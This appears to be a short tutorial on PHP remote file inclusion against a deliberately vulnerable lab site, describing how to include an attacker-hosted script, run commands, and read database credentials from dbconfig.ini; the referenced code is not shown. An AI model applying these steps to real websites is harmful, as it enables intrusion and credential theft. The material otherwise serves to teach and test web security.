Basic PHP Remote File Inclusion Exploitation
In this guide, we will perform a simple PHP remote file inclusion.
The goal of this exploit is to be able to successfully login on the website by using credentials stored in the database.
Gaining access to the login credentials will be achieved by dumping the database content through remote file inclusion (remote code execution).
The badly programmed website includes any files that are supplied as value to the phpfile parameter in the URL.
This exploit is made possible by bad programming practices and insecure server settings.
PHP is often used to load content dynamically by using parameters in the URL.
By providing a parameter to a link, the server will dyamically decide which content to load depending on the parameter value.
Instead of creating static pages for every possible value, the information can be loaded dynamically depending on the parameter value supplied with the link.
Testing remote file inclusion vulnerability can be done by adding a remote URL as value to the parameter.
The remote file inclusion is successful if a mixture of the original website and
the website behind the URL given as value to the vulnerable parameter is visible:
Including the script as value to the parameter (client IP: 192.168.4.67 server URL: 192.168.4.66).
Note that the script has to be uploaded and reachable by the web server hosting the vulnerable website.
In this case it is hosted on another webserver in the local network.
Remote Inclusion of the cmd.txt script with ‘dir’ command (lists folder contents):
PHP script to be included remotely (shows tables in the database, parses the dbconfig.ini stored on the vulnerable target webserver for SQL server login credentials):